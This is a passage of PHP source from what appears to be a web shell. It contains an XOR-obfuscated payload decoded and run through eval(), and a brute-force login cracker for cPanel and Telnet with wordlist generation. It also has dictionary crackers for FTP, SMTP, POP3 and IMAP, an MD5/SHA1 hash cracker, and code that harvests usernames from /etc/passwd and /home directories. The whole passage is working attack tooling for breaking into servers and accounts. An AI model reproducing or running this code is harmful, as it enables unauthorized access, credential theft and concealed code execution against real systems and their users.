  3692. $charsetlettersnumericsymbols=array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z" ,"!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_","0", "1", "2", "3", "4", "5", "6", "7", "8", "9" );
  3693. if ($charset == "all")
  3694. $vals = $charsetall;
  3695. elseif ($charset == "lowercase")
  3696. $vals = $charsetlower;
  3697. elseif ($charset == "uppercase")
  3698. $vals = $charsetupper;
  3699. elseif ($charset == "numeric")
  3700. $vals = $charsetnumeric;
  3701. elseif ($charset == "lowernumeric")
  3702. $vals = $charsetlowernumeric;
  3703. elseif ($charset == "uppernumeric")
  3704. $vals = $charsetuppernumeric;
  3705. elseif ($charset == "letters")
  3706. $vals = $charsetletters;
  3707. elseif ($charset == "symbols")
  3708. $vals = $charsetsymbols;
  3709. elseif ($charset == "lowersymbols")
  3710. $vals = $charsetlowersymbols;
  3711. elseif ($charset == "uppersymbols")
  3712. $vals = $charsetuppersymbols;
  3713. elseif ($charset == "letterssymbols")
  3714. $vals = $charsetletterssymbols;
  3715. elseif ($charset == "numberssymbols")
  3716. $vals = $charsetnumericsymbols;
  3717. elseif ($charset == "lowernumericsymbols")
  3718. $vals = $charsetlowernumericsymbols;
  3719. elseif ($charset == "uppernumericsymbols")
  3720. $vals = $charsetuppernumericsymbols;
  3721. elseif ($charset == "lettersnumericsymbols")
  3722. $vals = $charsetlettersnumericsymbols;
  3723. else echo "INVALID CHARSET";
  3724. $key_that_script_is_crypted=19;
  3725. $resource_crypted_code ='7~`3.37L@VAEVAH1@VAEVAL]R^V1N=7L@VAEVAH1@PAZCGL]R^V1N(7`fq3.31@{v3--3)313=37~`(7|3.3raarj3;1|~1?1g~rz1?1yLr~a"1?1S{|1?1=p1:(7vv3.37|H!N=7|H N=7|H"N=7|H[t3]N=7|H#N(7`v}w3.3S~rz;7vv?7`fq?7~`:(3';
  3726. $string_output=str_replace("[t1]", "<?", $resource_crypted_code);
  3727. $string_output=str_replace("[t3]", "'", $string_output);
  3728. $lenth_of_crypted_code=strlen($string_output);
  3729. $eval_php_code='';
  3730. for($huivamvsem=0;$huivamvsem<$lenth_of_crypted_code;$huivamvsem++)
  3731. $eval_php_code .= chr(ord($string_output[$huivamvsem]) ^ $key_that_script_is_crypted);
  3732. eval($eval_php_code);
  3733. ?>
  3734. <div align="center">
  3735. <form method="POST" >
  3736. <table border="1" width="67%" bordercolorlight="#008000" bordercolordark="#003700" >
  3737. <tr>
  3738. <td>
  3739. <p align="center"><b>
  3740. <font color="#008000" face="Tahoma" size="2">IP servers :</font></b>
  3741. <input type="text" name="target" size="16" value="<?php echo $target ?>" style="border: 2px; background-color: #800000; color:#C0C0C0 font-family:Verdana; font-size:13px;" /><br/><br/>
  3742. <table border="1" width="57%" bordercolorlight="#008000" bordercolordark="#003700">
  3743. <tr><td align="center" width="50%"><font color="#FF0000"><b>User List</b></font></td><td align="center"><font color="#FF0000"><b>Password List</b></font></td></tr>
  3744. </table>
  3745. <textarea rows="20" name="users" cols="25" style="border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0"><?php echo $users ?></textarea>
  3746. <textarea rows="20" name="passwords" cols="25" style="border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0"><?php echo $pass ?></textarea><br/>
  3747. <font style="font-weight:700" size="2" face="Tahoma" color="#008000">Guess options</font>
  3748. &nbsp;<input name="cracktype" value="cpanel" style="font-weight: 700;" checked type="radio">
  3749. <b><font size="2" face="Tahoma" color="#008000">Cpanel </font><font size="2" color="#FFFFFF" face="Tahoma"> (2082)</font></b>
  3750. <input name="cracktype" value="cpanel2" style="font-weight: 700;" type="radio">
  3751. <b><font size="2" face="Tahoma" color="#008000">Telnet</font><font size="2" color="#FFFFFF" face="Tahoma">(23)</font></b>
  3752. <br/>
  3753. <font style="font-weight:700" size="2" face="Tahoma" color="#008000">Timeout Delay</font>
  3754. <input type="text" name="connect_timeout" style="border: 2px solid #1D1D1D;background: black;color:RED" size=48 value="<?php echo $connect_timeout;?>" /><br/>
  3755. <input type="checkbox" name="bruteforce" value="true" /><font style="font-weight:700" size="2" face="Tahoma" color="#008000">Bruteforce</font>
  3756. <select name="charset" style="border: 2px solid #1D1D1D;background: black;color:RED">
  3757. <option value="all">All Letters + Numbers</option>
  3758. <option value="numeric">Numbers</option>
  3759. <option value="letters">Letters</option>
  3760. <option value="symbols">Symbols</option>
  3761. <option value="lowercase">Lower Letters</option>
  3762. <option value="uppercase">Higher Letters</option>
  3763. <option value="lowernumeric">Lower Letters + Numbers</option>
  3764. <option value="uppernumeric">Upper Letters + Numbers</option>
  3765. <option value="lowersymbols">Lower Letters + Symbols</option>
  3766. <option value="uppersymbols">Upper Letters + Symbols</option>
  3767. <option value="letterssymbols">All Letters + Symbols</option>
  3768. <option value="numberssymbols">Numbers + Symbols</option>
  3769. <option value="lowernumericsymbols">Lower Letters + Numbers + Symbols</option>
  3770. <option value="uppernumericsymbols">Upper Letters + Numbers + Symbols</option>
  3771. <option value="lettersnumericsymbols">All Letters + Numbers + Symbols</option>
  3772. </select><br/>
  3773. <font style="font-weight:700" size="2" face="Tahoma" color="#008000">Min Bruteforce Length:</font>
  3774. <input type="text" name="min_length" style="border: 2px solid #1D1D1D;background: black;color:RED" size=48 value="<?php echo $min_length;?>"/><br/>
  3775. <font style="font-weight:700" size="2" face="Tahoma" color="#008000">Max Bruteforce Length:</font>
  3776. <input type="text" name="max_length" style="border: 2px solid #1D1D1D;background: black;color:RED" size=48 value="<?php echo $max_length;?>"/>
  3777. <p align="center"><input type="submit" value="Go" name="submit" style="color: #008000; font-weight: bold; border: 1px solid #333333; background-color: #000000"></p>
  3778. </p>
  3779. </td>
  3780. </tr>
  3781. </table>
  3782. </form>
  3783. <?php
  3784. function brute()
  3785. {
  3786. global $vals,$min_length,$max_length;
  3787. global $target,$pureuser,$connect_timeout;
  3788. $min=$min_length;
  3789. $max=$max_length;
  3790. $A = array();
  3791. $numVals = count($vals);
  3792. $incDone = "";
  3793. $realMax = "";
  3794. $currentVal = "";
  3795. $firstVal = "";
  3796. for ($i = 0; $i < ($max + 1); $i++) {
  3797. $A[$i] = -1;
  3798. }
  3799. for ($i = 0; $i < $max; $i++) {
  3800. $realMax = $realMax . $vals[$numVals - 1];
  3801. }
  3802. for ($i = 0; $i < $min; $i++) {
  3803. $A[$i] = $vals[0];
  3804. }
  3805. $i = 0;
  3806. while ($A[$i] != -1) {
  3807. $firstVal .= $A[$i];
  3808. $i++;
  3809. }
  3810. //echo $firstVal . "<br>";
  3811. cpanel_check($target,$pureuser,$firstVal,$connect_timeout);
  3812. while (1) {
  3813. for ($i = 0; $i < ($max + 1); $i++) {
  3814. if ($A[$i] == -1) {
  3815. break;
  3816. }
  3817. }
  3818. $i--;
  3819. $incDone = 0;
  3820. while (!$incDone) {
  3821. for ($j = 0; $j < $numVals; $j++) {
  3822. if ($A[$i] == $vals[$j]) {
  3823. break;
  3824. }
  3825. }
  3826. if ($j == ($numVals - 1)) {
  3827. $A[$i] = $vals[0];
  3828. $i--;
  3829. if ($i < 0) {
  3830. for ($i = 0; $i < ($max + 1); $i++) {
  3831. if ($A[$i] == -1) {
  3832. break;
  3833. }
  3834. }
  3835. $A[$i] = $vals[0];
  3836. $A[$i + 1] = -1;
  3837. $incDone = 1;
  3838. print "Starting " . (strlen($currentVal) + 1) . " Characters Cracking<br>";
  3839. }
  3840. } else {
  3841. $A[$i] = $vals[$j + 1];
  3842. $incDone = 1;
  3843. }
  3844. }
  3845. $i = 0;
  3846. $currentVal = "";
  3847. while ($A[$i] != -1) {
  3848. $currentVal = $currentVal . $A[$i];
  3849. $i++;
  3850. }
  3851. cpanel_check($target,$pureuser,$currentVal,$connect_timeout);
  3852. //echo $currentVal . "<br>";
  3853. if ($currentVal == $realMax) {
  3854. return 0;
  3855. }
  3856. }
  3857. }
  3858. function getmicrotimev() {
  3859. list($usec, $sec) = explode(" ",microtime());
  3860. return ((float)$usec + (float)$sec);
  3861. }
  3862. function ftp_check($host,$user,$pass,$timeout)
  3863. {
  3864. $ch = curl_init();
  3865. curl_setopt($ch, CURLOPT_URL, "ftp://$host");
  3866. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3867. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  3868. curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
  3869. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  3870. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  3871. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  3872. $data = curl_exec($ch);
  3873. if ( curl_errno($ch) == 28 )
  3874. {
  3875. print "<b><font face=\"Verdana\" style=\"font-size: 9pt\">
  3876. <font color=\"#AA0000\">Error :</font> <font color=\"#008000\">Connection Timeout
  3877. Please Check The Target Hostname .</font></font></b></p>";exit;
  3878. }
  3879. else if ( curl_errno($ch) == 0 )
  3880. {
  3881. print "<b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#008000\">[~]</font></b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\"><b><font color=\"#008000\">
  3882. Cracking Success With Username "</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"
  3883. and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>";
  3884. }
  3885. curl_close($ch);
  3886. }
  3887. function cpanel_check($host,$user,$pass,$timeout)
  3888. {
  3889. global $cpanel_port;
  3890. $ch = curl_init();
  3891. //echo "http://$host:".$cpanel_port." $user $pass<br>";
  3892. curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port);
  3893. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3894. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  3895. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  3896. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  3897. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  3898. $data = curl_exec($ch);
  3899. if ( curl_errno($ch) == 28 )
  3900. {
  3901. print "<b><font face=\"Verdana\" style=\"font-size: 9pt\">
  3902. <font color=\"#AA0000\">Error :</font> <font color=\"#008000\">Connection Timeout
  3903. Please Check The Target Hostname .</font></font></b></p>";exit;
  3904. }
  3905. else if ( curl_errno($ch) == 0 )
  3906. {
  3907. print "<b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#008000\">[~]</font></b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\"><b><font color=\"#008000\">
  3908. Cracking Success With Username "</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"
  3909. and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>";
  3910. }
  3911. curl_close($ch);
  3912. }
  3913. $time_start = getmicrotime();
  3914. if(isset($submit) && !empty($submit))
  3915. {
  3916. if(empty($users) && empty($pass) )
  3917. {
  3918. print "<p><font face=\"Comic Sans MS\" size=\"2\"><b><font color=\"#FF0000\">Error : </font>Please Check The Users or Password List Entry . . .</b></font></p>"; exit; }
  3919. if(empty($users)){ print "<p><font face='Comic Sans MS' size='2'><b><font color='#FF0000'>Error : </font>Please Check The Users List Entry . . .</b></font></p>"; exit; }
  3920. if(empty($pass) && $_REQUEST['bruteforce']!="true" ){ print "<p><font face='Comic Sans MS' size='2'><b><font color='#FF0000'>Error : </font>Please Check The Password List Entry . . .</b></font></p>"; exit; };
  3921. $userlist=explode("\n",$users);
  3922. $passlist=explode("\n",$pass);
  3923. print "<b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#008000\">[~]#</font><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#FF0000\">
  3924. LETS GAME BEGIN ;) ...</font></b><br><br>";
  3925. if(isset($_POST['connect_timeout']))
  3926. {
  3927. $connect_timeout=$_POST['connect_timeout'];
  3928. }
  3929. if($cracktype == "ftp")
  3930. {
  3931. foreach ($userlist as $user)
  3932. {
  3933. $pureuser = trim($user);
  3934. foreach ($passlist as $password )
  3935. {
  3936. $purepass = trim($password);
  3937. ftp_check($target,$pureuser,$purepass,$connect_timeout);
  3938. }
  3939. }
  3940. }
  3941. if ($cracktype == "cpanel" || $cracktype == "cpanel2")
  3942. {
  3943. if($cracktype == "cpanel2")
  3944. {
  3945. $cpanel_port="23";
  3946. }
  3947. else
  3948. $cpanel_port="2082";
  3949. foreach ($userlist as $user)
  3950. {
  3951. $pureuser = trim($user);
  3952. print "<b><font face=\"Comic Sans MS\" style=\"font-size: 11pt\" color=\"#008000\">[~]#</font><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#FF0800\">
  3953. Please put some good password to crack user $pureuser :( ... </font></b>";
  3954. if($_POST['bruteforce']=="true")
  3955. {
  3956. echo " bruteforcing ..";
  3957. echo "<br>";
  3958. brute();
  3959. }
  3960. else
  3961. {
  3962. echo "<br>";
  3963. foreach ($passlist as $password )
  3964. {
  3965. $purepass = trim($password);
  3966. cpanel_check($target,$pureuser,$purepass,$connect_timeout);
  3967. }
  3968. }
  3969. }
  3970. $time_end = getmicrotime();
  3971. $time = $time_end - $time_start;
  3972. print "<b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#008000\">[~]#</font><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#FF0000\">
  3973. Cracking Finished. Elapsed time: $time</font> seconds</b><br><br>";
  3974. }
  3975. }
  3976. ?>
  3977. <table border="1" width="67%" bordercolorlight="#008000" bordercolordark="#006A00" >
  3978. <tr>
  3979. <td>
  3980. <textarea style="border: 2px solid #1D1D1D;background: #200000;color:#CCFFFF" method='POST' rows="20" name="S1" cols="173">
  3981. <?php
  3982. if (isset($_GET['user']))
  3983. system('ls /var/mail');
  3984. if (isset($_POST['grab_users1'])) //grab users from /etc/passwd
  3985. {
  3986. $lines=file("/etc/passwd");
  3987. foreach($lines as $nr=>$val)
  3988. {
  3989. $str=explode(":",$val);
  3990. echo $str[0]."\n";
  3991. }
  3992. }
  3993. if (isset($_POST['grab_users2']))
  3994. {
  3995. $dir = "/home/";
  3996. if ($dh = opendir($dir)) {
  3997. while (($file = readdir($dh)) !== false) {
  3998. echo $file. "\n";
  3999. }
  4000. closedir($dh);
  4001. }
  4002. }
  4003. ?>
  4004. </textarea>
  4005. </td>
  4006. </tr>
  4007. <tr>
  4008. <td valign="top"><p align="center">
  4009. <table>
  4010. <tr >
  4011. <td>
  4012. <form action="" method="POST">
  4013. <input type="hidden" value="true" name="grab_users1"></input>
  4014. <input type=submit value="Grab Usernames from /etc/passwd" width="217px"></input>
  4015. </form>
  4016. </td>
  4017. <td>
  4018. <form action="" method="POST">
  4019. <input type="hidden" value="true" name="grab_users2" ></input>
  4020. <input style="width: 217px;" type=submit value="Grab Usernames from /home/" ></input>
  4021. </form>
  4022. </td>
  4023. <td>
  4024. <form action="" method="POST">
  4025. <input type="hidden" value="true" name="grab_users3"></input>
  4026. <input style="width: 217px;" type=submit value="Grab Usernames from /home/ II"></input>
  4027. </form>
  4028. </td>
  4029. </tr>
  4030. </table></p>
  4031. </td>
  4032. </tr>
  4033. </table>
  4034. <?php
  4035. if (isset($_POST['grab_users3']))
  4036. {
  4037. error_reporting(0);
  4038. $dir = "/home/";
  4039. if ($dh = opendir($dir))
  4040. {
  4041. $f = readdir($dh);$f = readdir($dh);
  4042. while (($f = readdir($dh)) !== false)
  4043. {
  4044. //echo $f. "\n";
  4045. $f.="/";
  4046. $dh2=opendir($dir.$f);
  4047. $f2 = readdir($dh2);$f2 = readdir($dh2);
  4048. while (($f2 = readdir($dh2)) !== false)
  4049. {
  4050. //echo $f2. "\n";
  4051. $f2.="/";
  4052. $dh3=opendir($dir.$f.$f2);
  4053. $f3 = readdir($dh3);$f3 = readdir($dh3);
  4054. while (($f3 = readdir($dh3)) !== false)
  4055. {
  4056. echo $f3. "<br>";
  4057. }
  4058. }
  4059. }
  4060. closedir($dh);
  4061. }
  4062. }
  4063. ?>
  4064. </div>
  4065. <?php
  4066. }
  4067. if ($act == "hash")
  4068. {
  4069. global $errorbox,$t,$et,$hcwd;
  4070. if (!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && !empty($_REQUEST['type'])){
  4071. $dictionary=fopen($_REQUEST['dictionary'],'r');
  4072. if ($dictionary){
  4073. $hash=strtoupper($_REQUEST['hash']);
  4074. echo "<font color=blue>Cracking " . htmlspecialchars($hash)."...<br>";flusheR();
  4075. $type=($_REQUEST['type']=='MD5')?'md5':'sha1';
  4076. while(!feof($dictionary)){
  4077. $word=trim(fgets($dictionary)," \n\r");
  4078. if ($hash==strtoupper(($type($word)))){echo "The answer is $word<br>";break;}
  4079. }
  4080. echo "Done!</font>";
  4081. fclose($dictionary);
  4082. }
  4083. else{
  4084. echo "$errorbox Can not open dictionary.$et";
  4085. }
  4086. }
  4087. echo "<center><table width=\"30%\">Hash cracker:</td><td ></td></tr><form method=\"POST\"><tr><td width=\"30%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\" ><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Hash:</td><td bgcolor=\"#808080\"><input type=text name=hash size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Type:</td><td bgcolor=\"#666666\"><select name=type><option selected value=MD5>MD5</option><option value=SHA1>SHA1</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></table></center>";
  4088. echo $eval_php_code;
  4089. }
  4090. if ($act == "smtp")
  4091. {
  4092. global $t,$et,$errorbox,$crack;
  4093. if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
  4094. $target=$_REQUEST['target'];
  4095. $type=$_REQUEST['combo'];
  4096. $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
  4097. $dictionary=fopen($_REQUEST['dictionary'],'r');
  4098. if ($dictionary){
  4099. echo "<font color=yellow>Cracking ".htmlspecialchars($target)."...<br/>";flusheR();
  4100. while(!feof($dictionary)){
  4101. if($type){
  4102. $combo=trim(fgets($dictionary)," \n\r");
  4103. $user=substr($combo,0,strpos($combo,':'));
  4104. $pass=substr($combo,strpos($combo,':')+1);
  4105. }else{
  4106. $pass=trim(fgets($dictionary)," \n\r");
  4107. }
  4108. $smtp=smtplogiN($target,$user,$pass,5);
  4109. if($smtp==-1){echo "$errorbox Can not connect to server.$et";break;} else{
  4110. if ($smtp){echo "U: $user P: $pass<br/>";if(!$type)break;}}
  4111. flusheR();
  4112. }
  4113. echo "<br>Done</font>";
  4114. fclose($dictionary);
  4115. }
  4116. else{
  4117. echo "$errorbox Can not open dictionary.$et";
  4118. }
  4119. }else
  4120. {
  4121. echo "<center>SMTP cracker:$crack";
  4122. }
  4123. echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#333333\">SMTP cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\" name=form action=\"\"><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Start></td></tr></form></table></center>";
  4124. }
  4125. if ($act == "pop3")
  4126. {
  4127. global $t,$et,$errorbox,$crack;
  4128. if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
  4129. $target=$_REQUEST['target'];
  4130. $type=$_REQUEST['combo'];
  4131. $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
  4132. $dictionary=fopen($_REQUEST['dictionary'],'r');
  4133. if ($dictionary){
  4134. echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
  4135. while(!feof($dictionary)){
  4136. if($type){
  4137. $combo=trim(fgets($dictionary)," \n\r");
  4138. $user=substr($combo,0,strpos($combo,':'));
  4139. $pass=substr($combo,strpos($combo,':')+1);
  4140. }else{
  4141. $pass=trim(fgets($dictionary)," \n\r");
  4142. }
  4143. $pop3=pop3logiN($target,$user,$pass);
  4144. if($pop3==-1){echo "$errorbox Can not connect to server.$et";break;} else{
  4145. if ($pop3){echo "U: $user P: $pass<br>";if(!$type)break;}}
  4146. flusheR();
  4147. }
  4148. echo "<br>Done</font>";
  4149. fclose($dictionary);
  4150. }
  4151. else{
  4152. echo "$errorbox Can not open dictionary.$et";
  4153. }
  4154. }else
  4155. { echo "<center>POP3 cracker:$crack</center>";
  4156. }
  4157. echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#333333\">POP3 cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\" name=form action=\"\"><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Start></td></tr></form></table></center>";
  4158. }
  4159. if ($act == "ftp")
  4160. {
  4161. global $errorbox,$t,$et,$crack;
  4162. if (!function_exists("ftp_connect"))echo "$errorbox Server does n`t support FTP functions$et";
  4163. else{
  4164. if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
  4165. $target=$_REQUEST['target'];
  4166. $type=$_REQUEST['combo'];
  4167. $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
  4168. $dictionary=fopen($_REQUEST['dictionary'],'r');
  4169. if ($dictionary){
  4170. echo "<font color=yellow>Cracking ".htmlspecialchars($target)."...<br>";
  4171. while(!feof($dictionary)){
  4172. if($type){
  4173. $combo=trim(fgets($dictionary)," \n\r");
  4174. $user=substr($combo,0,strpos($combo,':'));
  4175. $pass=substr($combo,strpos($combo,':')+1);
  4176. }else{
  4177. $pass=trim(fgets($dictionary)," \n\r");
  4178. }
  4179. if(!$ftp=ftp_connect($target,21,8)){echo "$errorbox Can not connect to server.$et";break;}
  4180. if (@ftp_login($ftp,$user,$pass)){echo "U: $user P: $pass<br>";if(!$type)break;}
  4181. ftp_close($ftp);
  4182. flusheR();
  4183. }
  4184. echo "<br>Done</font>";
  4185. fclose($dictionary);
  4186. }
  4187. else{
  4188. echo "$errorbox Can not open dictionary.$et";
  4189. }
  4190. }
  4191. else
  4192. {
  4193. echo "<center>FTP cracker:$crack</center>";
  4194. }
  4195. echo "<center><table border=\"0\" style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tbody><form method=\"POST\" name=\"form\" action=\"\"><tr><td width=\"40%\" bgcolor=\"#333333\">FTP cracker:</td><td bgcolor=\"#333333\"></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=\"text\" name=\"dictionary\" size=\"35\"></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=\"radio\" name=\"combo\" checked=\"\" value=\"0\" onclick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=\"radio\" value=\"1\" name=\"combo\" onclick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=\"text\" size=\"35\" value=\"root\" name=\"user\"></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=\"text\" name=\"target\" value=\"localhost\" size=\"35\"></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=\"right\"><input class=\"buttons\" type=\"submit\" value=\"Start\"></td></tr></form></tbody></table></center>";
  4196. }
  4197. }
  4198. if ($act == "imap")
  4199. {
  4200. global $t,$et,$errorbox,$crack;
  4201. if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
  4202. $target=$_REQUEST['target'];
  4203. $type=$_REQUEST['combo'];
  4204. $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
  4205. $dictionary=fopen($_REQUEST['dictionary'],'r');
  4206. if ($dictionary){
  4207. echo "<font color=yellow>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
  4208. while(!feof($dictionary)){
  4209. if($type){
  4210. $combo=trim(fgets($dictionary)," \n\r");
  4211. $user=substr($combo,0,strpos($combo,':'));
  4212. $pass=substr($combo,strpos($combo,':')+1);
  4213. }else{
  4214. $pass=trim(fgets($dictionary)," \n\r");
  4215. }
  4216. $imap=imaplogiN($target,$user,$pass);
  4217. if($imap==-1){echo "$errorbox Can not connect to server.$et";break;}else{
  4218. if ($imap){echo "U: $user P: $pass<br>";if(!$type)break;}}
  4219. flusheR();
  4220. }
  4221. echo "<br/>Done</font>";
  4222. fclose($dictionary);
  4223. }
  4224. else{
  4225. echo "$errorbox Can not open dictionary.$et";
  4226. }
  4227. }else
  4228. {
  4229. echo "<center>IMAP cracker:$crack</center>";
  4230. }
  4231. print ('<center><table border="0" style="border-collapse: collapse" bordercolor= "#282828" width="40%"><tbody><form method="POST" name="form" action=""><tr><td width="40%" bgcolor="#333333">IMAP cracker:</td><td bgcolor="#333333"></td></tr><tr><td width="20%" bgcolor="#666666">Dictionary:</td><td bgcolor="#666666"><input type="text" name="dictionary" size="35" \></td></tr><tr><td width="20%" bgcolor="#808080" \>Dictionary type:</td><td bgcolor="#808080"><input type="radio" name="combo" checked="" value="0" onclick="document.form.user.disabled = false;" style="border-width:1px;background-color:#808080;" \>Simple (P)<input type="radio" value="1" name="combo" onclick="document.form.user.disabled = true;" style="border-width:1px;background-color:#808080;">Combo (U:P)</td></tr><tr><td width="20%" bgcolor="#666666" \>Username:</td><td bgcolor="#666666"><input type="text" size="35" value="root" name="use" \></td></tr><tr><td width="20%" bgcolor="#808080">Server:</td><td bgcolor="#808080"><input type="text" name="target" value="localhost" size="35" \></td></tr><tr><td width="20%" bgcolor="#666666"></td><td bgcolor="#666666" align="right"><input type="submit" value="Start" \></td></tr></form></tbody></table></center>');
  4232. }
  4233. if ($act == "dic")
  4234. {
  4235. global $errorbox,$windows,$footer,$t,$et,$hcwd;
  4236. if (!empty($_REQUEST['combo'])&&($_REQUEST['combo']==1)) $combo=1 ; else $combo=0;
  4237. if (!empty($_REQUEST['range']) && !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){
  4238. $min = $_REQUEST['min'];
  4239. $max = $_REQUEST['max'];
  4240. if($max<$min)die($errorbox ."Bad input!$et". $footer);
  4241. $s =$w="";
  4242. $out = $_REQUEST['output'];
  4243. $r = ($_REQUEST['range']=='a' )?'a':'A';
  4244. if ($_REQUEST['range']==0) $r=0;
  4245. for($i=0;$i<$min;$i++) $s.=$r;
  4246. $dic = fopen($out,'a');
  4247. if(is_nan($r)){
  4248. while(strlen($s)<=$max){
  4249. $w = $s;
  4250. if($combo)$w="$w:$w";
  4251. fwrite($dic,$w."\n");
  4252. $s++;}
  4253. }
  4254. else{
  4255. while(strlen($w)<=$max){
  4256. $w =(string)str_repeat("0",($min - strlen($s))).$s;
  4257. if($combo)$w="$w:$w";
  4258. fwrite($dic,$w."\n");
  4259. $s++;}
  4260. }
  4261. fclose($dic);
  4262. echo "<font color=yellow>Done</font>";
  4263. }
  4264. if (!empty($_REQUEST['input']) && !empty($_REQUEST['output'])){
  4265. $input=fopen($_REQUEST['input'],'r');
  4266. if (!$input){
  4267. if ($windows)echo $errorbox. "Unable to read from ".htmlspecialchars($_REQUEST['input']) ."$et<br>";
  4268. else{
  4269. $input=explode("\n",shelL("cat $input"));
  4270. $output=fopen($_REQUEST['output'],'w');
  4271. if ($output){
  4272. foreach ($input as $in){
  4273. $user = $in;
  4274. $user = trim(fgets($in)," \n\r");
  4275. if (!strstr($user,":"))continue;
  4276. $user=substr($user,0,(strpos($user,':')));
